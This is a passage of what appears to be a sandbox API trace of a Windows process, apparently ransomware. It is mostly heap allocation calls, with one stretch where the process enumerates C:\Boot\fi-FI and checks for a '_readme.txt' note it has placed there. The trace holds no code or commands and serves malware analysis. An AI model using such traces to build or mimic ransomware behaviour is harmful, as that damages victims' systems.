out: hHeap=0x6e0000) returned 1 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.512] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.512] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.513] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.513] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.514] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.514] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.514] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.514] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.514] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.514] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.514] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.514] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.514] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.514] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.514] PathFindFileNameW (pszPath="") returned="" [0146.514] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.514] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.514] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.515] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.515] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.515] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.515] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.515] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.515] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0146.515] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.515] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.515] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0146.516] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.516] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.516] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.516] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.516] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.516] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.516] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.516] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.516] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.517] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.517] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.518] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.518] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, 